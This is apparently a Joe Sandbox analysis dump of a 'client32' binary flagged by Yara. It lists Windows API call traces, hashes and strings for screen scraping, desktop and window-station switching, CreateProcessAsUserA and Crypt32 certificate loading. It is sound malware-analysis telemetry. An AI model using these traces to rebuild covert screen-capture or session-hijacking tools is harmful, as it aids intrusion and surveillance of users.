                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalInitializeSection_memset
                                                        • String ID:
                                                        • API String ID: 453477542-0
                                                        • Opcode ID: 816619bd5292480784461fccd4379953b6d04930cd08cba2fa59dc4f2141ea10
                                                        • Instruction ID: 47d3f0b7005f24d88c5ba47056aa192fd225d793499904ccbf0e969ed53c4eab
                                                        • Opcode Fuzzy Hash: 816619bd5292480784461fccd4379953b6d04930cd08cba2fa59dc4f2141ea10
                                                        • Instruction Fuzzy Hash: 721157B1901B048FC3A4CF7A88817C7FBE5BB49311F80892E95EEC2200DB716560CF90
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111338B1
                                                        • ExtractIconExA.SHELL32(?,00000000,0004041F,0001043F,00000001), ref: 111338E8
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExtractFileIconModuleName
                                                        • String ID:
                                                        • API String ID: 3911389742-0
                                                        • Opcode ID: 336059a513dda44203e69ba7318e9ebe477f3c8b73331cb78105c2dcabdbca92
                                                        • Instruction ID: d4a943c9381133178395c29230453ef0d97f3a1f5bc1fa0403f3ff13df378306
                                                        • Opcode Fuzzy Hash: 336059a513dda44203e69ba7318e9ebe477f3c8b73331cb78105c2dcabdbca92
                                                        • Instruction Fuzzy Hash: 54F0B479A041186FEB08DF60CC9BFBDF3A8E784708F80C66DED52961C4CEB029448B40
                                                        APIs
                                                          • Part of subcall function 11157CCF: __getptd_noexit.LIBCMT ref: 11157CCF
                                                        • __lock_file.LIBCMT ref: 111522E8
                                                          • Part of subcall function 11159979: __lock.LIBCMT ref: 1115999E
                                                        • __fclose_nolock.LIBCMT ref: 111522F3
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: c6b8653c850ed822458d0e8f4dbe2789ca03e628ce26c4628c0bda2659fbdc38
                                                        • Instruction ID: b4dba51b1251756d021d203fd4787ec9a19dcc6820a565d6ebdbe948f49b8c94
                                                        • Opcode Fuzzy Hash: c6b8653c850ed822458d0e8f4dbe2789ca03e628ce26c4628c0bda2659fbdc38
                                                        • Instruction Fuzzy Hash: BBF0903A811607DEDBD09B7588007DEFBA09F0333CF108344E438AA1D0DB786A429F56
                                                        APIs
                                                        • WSACancelBlockingCall.WSOCK32 ref: 6C804E69
                                                        • Sleep.KERNEL32(00000032), ref: 6C804E73
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: BlockingCallCancelSleep
                                                        • String ID:
                                                        • API String ID: 3706969569-0
                                                        • Opcode ID: b2cfbbf4e4914294731165def32e1c6a363d0ca7f80b3cb9e69e583529cd6e43
                                                        • Instruction ID: 9a99c746948e08471bbff718b0d466d285f3cd816a56df3cb70a6f25417664a5
                                                        • Opcode Fuzzy Hash: b2cfbbf4e4914294731165def32e1c6a363d0ca7f80b3cb9e69e583529cd6e43
                                                        • Instruction Fuzzy Hash: 1CB092703D224106ABB012B80F183AA20D96BE426EFA09C70B945C9E85EF20C104E1A1
                                                        APIs
                                                          • Part of subcall function 11134180: ExpandEnvironmentStringsA.KERNEL32(75A3795C,?,00000104,75A3795C), ref: 111341A7
                                                          • Part of subcall function 111524D7: __fsopen.LIBCMT ref: 111524E4
                                                        • GetLastError.KERNEL32(?,00000000,75A3795C,00000000), ref: 11134295
                                                        • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,75A3795C,00000000), ref: 111342A5
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                        • String ID:
                                                        • API String ID: 3768737497-0
                                                        • Opcode ID: 4d6c099333632b985558e77fdbfed47ff203cda0402669eff27874c5330c3e1c
                                                        • Instruction ID: c387f289c61fefa2e5298b52aaefc30f01b1045fb1e2ae40e0bebc4dd9c1f7d1
                                                        • Opcode Fuzzy Hash: 4d6c099333632b985558e77fdbfed47ff203cda0402669eff27874c5330c3e1c
                                                        • Instruction Fuzzy Hash: 96114C7AD40109AFDB518FD4D984EAFFB78EB8626AF010164EC04A7604D730AD4087E2
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 110109B4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LockitLockit::_std::_
                                                        • String ID:
                                                        • API String ID: 3382485803-0
                                                        • Opcode ID: 1385057775134fbb1bc964ec1c8f376cb1cd366a7f35dc4fb300ae432e8f24af
                                                        • Instruction ID: 45c645539fb1ee64975a99796d46acc60ecc28b62f5a4bb4ed7206e1cf6f0728
                                                        • Opcode Fuzzy Hash: 1385057775134fbb1bc964ec1c8f376cb1cd366a7f35dc4fb300ae432e8f24af
                                                        • Instruction Fuzzy Hash: 1C518D75B00645DFDB00CF98C990AADBBF6BF89718F24829DD5469B385C736E902CB90
                                                        APIs
                                                        • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A38400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: QueryValue
                                                        • String ID:
                                                        • API String ID: 3660427363-0
                                                        • Opcode ID: 5016ec284c3da2d402a74a179208904017d38d52b2a07d1272dd52b37792262b
                                                        • Instruction ID: 57cc01f50fbb590e2524d85a16b2fbab3df4c7fb8930128a4a94bf816e4774f3
                                                        • Opcode Fuzzy Hash: 5016ec284c3da2d402a74a179208904017d38d52b2a07d1272dd52b37792262b
                                                        • Instruction Fuzzy Hash: C711E9717142456FEB21DE04D590AEFFBB9EBC533AF20816AE5194790CC231D482C760
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110EF18D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: fb78fbe809c35f0ef85edaf52d24d1374a363710fbb08966f967051581e1cc5d
                                                        • Instruction ID: e567e6d9deb43754708739d5b8ecc67293fcf28fe655b386a3f4b7f61280699d
                                                        • Opcode Fuzzy Hash: fb78fbe809c35f0ef85edaf52d24d1374a363710fbb08966f967051581e1cc5d
                                                        • Instruction Fuzzy Hash: 22118675A0155D9FDB11CBA9DC94AEEB7EC9F49304F4040DDE9099B240EA70AF488B91
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000008,1102F53F,00000000,?,111587B4,?,1102F53F,00000000,00000000,00000000,?,1115A147,00000001,00000214,?,111028FE), ref: 1115EB27
                                                          • Part of subcall function 11157CCF: __getptd_noexit.LIBCMT ref: 11157CCF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 328603210-0
                                                        • Opcode ID: b273a25811fde905e5cee87c6aa7cb02e25be8654d74a1ff2e42c0156245fb87
                                                        • Instruction ID: 332878df44de031bd3fde79402edd0d066dbf36eb0a5f5ad350df6a08150c577
                                                        • Opcode Fuzzy Hash: b273a25811fde905e5cee87c6aa7cb02e25be8654d74a1ff2e42c0156245fb87
                                                        • Instruction Fuzzy Hash: 59017532B022769AEBD58E25C994B5AF759AB83766F01C629E836C75D0D770D800C760
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __waccess_s
                                                        • String ID:
                                                        • API String ID: 4272103461-0
                                                        • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                        • Instruction ID: 840aff0e7d330be87414fd3cd5a9ac48178d49a546ea7aaee28d5de4cbf962c1
                                                        • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                        • Instruction Fuzzy Hash: F2C02B3300400D7F4F480DE1EC00C043F1DC6803347204211F81CCC090DD32E4108140
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __fsopen
                                                        • String ID:
                                                        • API String ID: 3646066109-0
                                                        • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                        • Instruction ID: cdd7364d54deba196aaed2948fa43e78b4163aec9a4e7603f5b1489158abed43
                                                        • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                        • Instruction Fuzzy Hash: F2C0927754020CB7CF911A82EC02E9A7F2A9BC1668F148020FB2C19160AA73EA619689
                                                        APIs
                                                        • _NSMClient32@8.PCICL32(?,?,?,009D10AB,00000000), ref: 009D1009
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3741969770.00000000009D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3741789673.00000000009D0000.00000002.00000001.01000000.00000007.sdmp
                                                        • Associated: 0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Client32@8
                                                        • String ID:
                                                        • API String ID: 433899448-0
                                                        • Opcode ID: dcaa56d6c6c8e88b1e4f95152afe5240dafa7d8740490bf80e3636b52cdfcebe
                                                        • Instruction ID: 8d0473fa9356ad18d4e59706d2568dafb867c3e2077871d3c6b05fe7508367fe
                                                        • Opcode Fuzzy Hash: dcaa56d6c6c8e88b1e4f95152afe5240dafa7d8740490bf80e3636b52cdfcebe
                                                        • Instruction Fuzzy Hash: 68B0123308024D77CF017E81EE01D4B3B1DAB40310F004412FE100126286A398B0B663
                                                        APIs
                                                        • _calloc.LIBCMT ref: 111172AF
                                                        • GetDC.USER32(00000000), ref: 111172E8
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 111172F7
                                                        • CreateCompatibleBitmap.GDI32(00000000,FFFFFFFF,00000001), ref: 1111730C
                                                        • SelectObject.GDI32(00000000,00000000), ref: 1111731A
                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 1111732F
                                                        • GetDeviceCaps.GDI32(?,0000000C), ref: 1111733C
                                                        • _malloc.LIBCMT ref: 11117363
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • _calloc.LIBCMT ref: 11117374
                                                        • Sleep.KERNEL32(11117E9D), ref: 111173B8
                                                        • GetTickCount.KERNEL32 ref: 111173BE
                                                        • GetSystemMetrics.USER32(0000004C), ref: 11117418
                                                        • GetSystemMetrics.USER32(0000004D), ref: 11117422
                                                        • GetTickCount.KERNEL32 ref: 1111749C
                                                        • WaitForSingleObject.KERNEL32(?,000000FA), ref: 111174D1
                                                        • _memset.LIBCMT ref: 111174F5
                                                        • _memset.LIBCMT ref: 11117507
                                                        • _malloc.LIBCMT ref: 1111762B
                                                        • _malloc.LIBCMT ref: 11117658
                                                        • _memset.LIBCMT ref: 11117671
                                                        • _calloc.LIBCMT ref: 111176D1
                                                        • _calloc.LIBCMT ref: 111176EF
                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000100,?), ref: 1111771A
                                                        • GetStockObject.GDI32(0000000F), ref: 11117752
                                                        • SelectPalette.GDI32(?,00000000), ref: 11117760
                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 11117770
                                                        • SelectPalette.GDI32(?,?,00000000), ref: 11117786
                                                        • RealizePalette.GDI32(?), ref: 11117793
                                                        • _memset.LIBCMT ref: 111177E5
                                                        • SelectPalette.GDI32(?,?,00000000), ref: 11117807
                                                        • DeleteObject.GDI32(?), ref: 1111780E
                                                        • CreatePalette.GDI32(?), ref: 1111782B
                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 11117841
                                                        • RealizePalette.GDI32(?), ref: 1111784E
                                                        • BitBlt.GDI32(?,00000000,00000000,FFFFFFFF,00000001,?,?,?,00CC0020), ref: 1111788D
                                                        • GetObjectA.GDI32(?,00000018,?), ref: 111178A3
                                                        • GetBitmapBits.GDI32(?,?,?), ref: 111178BE
                                                        • GetDIBits.GDI32(?,?,00000000,00000001,?,?,00000000), ref: 11117913
                                                        • _malloc.LIBCMT ref: 11117B49
                                                        • GetTickCount.KERNEL32 ref: 11117DF6
                                                        • CloseHandle.KERNEL32(?), ref: 11117E03
                                                        • _free.LIBCMT ref: 11117E15
                                                        • _free.LIBCMT ref: 11117E21
                                                        • _free.LIBCMT ref: 11117E2D
                                                        • _free.LIBCMT ref: 11117E39
                                                        • SelectObject.GDI32(?,?), ref: 11117E4F
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Palette$Select$Object$_calloc_free_malloc_memset$CountCreateSystemTick$BitmapBitsCapsCompatibleDeviceMetricsRealize$AllocateCloseDeleteEntriesErrorExitHandleHeapLastMessageProcessSingleSleepStockWaitwsprintf
                                                        • String ID: ($@L(t$Client$SCRAPE.CPP$ScreenScrapeCPU$_$hStopScrape
                                                        • API String ID: 3932011530-1240846060
                                                        • Opcode ID: 41f4eb196c39dc6a78c837dce78470dc62e23143fc7ef4ff3f55dc3ed3300e45
                                                        • Instruction ID: bf10a9902b4c1d1c1bebc66a4f47a1518a6e4e764ac0c29533848247b5017043
                                                        • Opcode Fuzzy Hash: 41f4eb196c39dc6a78c837dce78470dc62e23143fc7ef4ff3f55dc3ed3300e45
                                                        • Instruction Fuzzy Hash: 427239B59002698FDB61DF24CC84B99FBF5BB49304F14C1E9E589AB244DB71AE81CF90
                                                        APIs
                                                        • _memset.LIBCMT ref: 110854D4
                                                        • GetVersionExA.KERNEL32(?,00000000,?,00000000), ref: 110854ED
                                                        • OpenWindowStationA.USER32(winsta0,00000000,00060000), ref: 1108551F
                                                        • GetProcessWindowStation.USER32 ref: 1108552D
                                                        • SetProcessWindowStation.USER32(00000000), ref: 1108553C
                                                        • OpenDesktopA.USER32(default,00000000,00000000,00060081), ref: 11085552
                                                        • SetProcessWindowStation.USER32(00000000), ref: 11085565
                                                        • CloseWindowStation.USER32(00000000), ref: 1108556C
                                                        • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11085590
                                                        • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 110855A5
                                                          • Part of subcall function 110851E0: GetUserObjectSecurity.USER32(?,?,00000000,00000000,?), ref: 11085218
                                                          • Part of subcall function 110851E0: GetProcessHeap.KERNEL32(00000008,?), ref: 1108522A
                                                          • Part of subcall function 110851E0: HeapAlloc.KERNEL32(00000000), ref: 11085231
                                                          • Part of subcall function 110851E0: GetUserObjectSecurity.USER32(?,00000004,110855CC,?,?), ref: 11085247
                                                          • Part of subcall function 110851E0: GetUserObjectSecurity.USER32(00000001,00000004,00000000,00000001,00000001), ref: 11085265
                                                          • Part of subcall function 110851E0: GetProcessHeap.KERNEL32(00000008,00000001), ref: 11085271
                                                          • Part of subcall function 110851E0: HeapAlloc.KERNEL32(00000000), ref: 11085278
                                                          • Part of subcall function 110851E0: GetUserObjectSecurity.USER32(00000001,00000004,?,00000001,00000001), ref: 1108528E
                                                          • Part of subcall function 110851E0: GetSecurityDescriptorDacl.ADVAPI32(110855CC,00000000,?,?), ref: 110852B0
                                                          • Part of subcall function 110851E0: GetSecurityDescriptorDacl.ADVAPI32(?,00000000,?,?), ref: 110852C9
                                                        • _memset.LIBCMT ref: 110855E7
                                                        • LoadLibraryA.KERNEL32(userenv), ref: 11085606
                                                        • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 11085618
                                                        • IsBadReadPtr.KERNEL32(?,00000001), ref: 1108563B
                                                        • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 1108568E
                                                        • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 110856AB
                                                        • FreeLibrary.KERNEL32(00000000), ref: 110856C3
                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 110856EF
                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11085710
                                                        • DispatchMessageA.USER32(?), ref: 1108571D
                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 1108572E
                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 11085746
                                                        • CloseHandle.KERNEL32(00000000), ref: 11085765
                                                        • CloseHandle.KERNEL32 ref: 1108576A
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 11085779
                                                        • HeapFree.KERNEL32(00000000), ref: 11085780
                                                        • CloseDesktop.USER32(?), ref: 11085797
                                                        • GetLastError.KERNEL32 ref: 110857A1
                                                        • SetProcessWindowStation.USER32(?), ref: 110857BC
                                                        • CloseWindowStation.USER32(?), ref: 110857CD
                                                        • GetLastError.KERNEL32 ref: 110857D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$StationWindow$HeapSecurity$CloseUser$HandleObject$Message$AddressAllocDaclDescriptorDesktopErrorFreeInformationLastLibraryMultipleObjectsOpenPeekProcWait_memset$CreateDispatchLoadReadVersion
                                                        • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$Error closing desktop, e=%d$Error closing winsta, e=%d$default$userenv$winsta0
                                                        • API String ID: 2664440712-1106524449
                                                        • Opcode ID: 677b5d0fbb0e76526f67e711a5c73b3ce293ee8ad6a0a9596ae823fe0477a226
                                                        • Instruction ID: f061770eabc51647ab4d4230c3b4071e061b0d94ed79287bc5cfb6b3fcb425fe
                                                        • Opcode Fuzzy Hash: 677b5d0fbb0e76526f67e711a5c73b3ce293ee8ad6a0a9596ae823fe0477a226
                                                        • Instruction Fuzzy Hash: A1B18075E00329AFEB21DF658C84F9EBBB8BF45714F4081D9E919A3284DB719980CF61
                                                        APIs
                                                          • Part of subcall function 110A4AA0: LoadLibraryA.KERNEL32(Crypt32.dll,00000000,?,110A5885,82E0FB89,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?), ref: 110A4AE0
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertCreateCertificateContext), ref: 110A4AFC
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertFreeCertificateContext), ref: 110A4B09
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertGetNameStringA), ref: 110A4B16
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertGetValidUsages), ref: 110A4B23
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertOpenStore), ref: 110A4B30
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertOpenSystemStoreA), ref: 110A4B3D
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertCloseStore), ref: 110A4B4A
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertAddCertificateContextToStore), ref: 110A4B57
